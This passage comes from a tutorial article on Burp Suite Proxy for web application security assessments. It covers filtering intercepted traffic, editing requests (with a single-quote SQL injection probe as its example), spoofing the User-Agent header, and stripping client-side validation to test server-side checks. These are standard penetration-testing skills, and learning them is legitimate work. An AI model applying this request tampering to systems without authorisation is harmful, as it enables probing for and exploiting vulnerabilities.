display filter, at the top of the history list to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection. At this point, you may have already understood the potentialities of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses as you can filter relevant traffic only by using regular expressions or simply matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages. Step 3 – Tampering web requests As part of a typical security assessment, you will need to modify HTTP requests and analyze the web application responses. For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) in all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge on common web application vulnerabilities, the OWASP Top Ten Project article at https://www. owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point. Tampering web requests with Burp is as easy as editing strings in a text editor: Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP. Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request. From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the the GET parameter's keys value from ASP to PHP. Edit the request to look like the following: GET /books/all?keys=PHP HTTP/1.1Host: www.packtpub.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0)Gecko/20100101 Firefox/15.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflateProxy-Connection: keep-alive Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page. Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy view. For example, in the params view, it is possible to add a new parameter by following these steps: Clicking on new (right side), from the Burp Proxy params view. Selecting the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters. Typing the name and the value of the newly created parameter. Advanced features After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations. Match and replace Let's imagine that you are testing an application designed for mobile devices using a standard browser from your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and respond with customized resources that better fit mobile phones and tablets. Under these circumstances, you will particularly find the match and replace function, provided by Burp Proxy, very useful. Let's configure Burp Proxy in order to tamper the user-agent HTTP header field: In the options tab of Burp Proxy, scroll down to the match and replace section. Under the match and replace table, a drop-down list and two text fields allow to create a customized rule. Select request header from the drop-down list since we want to create a match condition pertaining to HTTP requests. Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart. html. In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3 or any other fake user-agent that you want to impersonate. Click add and verify that the new match has been added to the list; this button is shown here: Burp Proxy match and replace list Intercept a request, leave it to pass through the proxy, and verify that it has been automatically modified by the tool. Automatically modified HTTP header in Burp Proxy HTML modification Another interesting feature of Burp Proxy is the automatic HTML modification, that can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you would need to tamper the request with invalid data. In these situations, you can either manually tamper the request in the proxy or enable HTML modification to remove any client-side validation and use the browser in order to submit invalid data. This function can be also used to display hidden form fields. Let's see in practice how you can activate this feature: In Burp Proxy, go to options, scroll down to the HTML modification section. Numerous options are available in this section: unhide hidden form fields to display hidden HTML form fields, enable disabled form fields to submit all input forms present inside the HTML page, remove input field length limits to allow extra-long strings in the text fields, remove JavaScript form validation to make Burp Proxy all onsubmit handler JavaScript functions from HTML forms, remove all JavaScript to completely remove all JS scripts and remove object tags to remove embedded objects within the HTML document. Select the desired checkboxes to activate automatic HTML modification. Summary Using this feature, you will be able to understand whether the web application enforces server- side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser. Resources for Article : Further resources on this subject: Visual Studio 2010 Test Types [Article] Ordered and Generic Tests in Visual Studio 2010 [Article] Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]  
Read more
  • 0
  • 0
  • 4200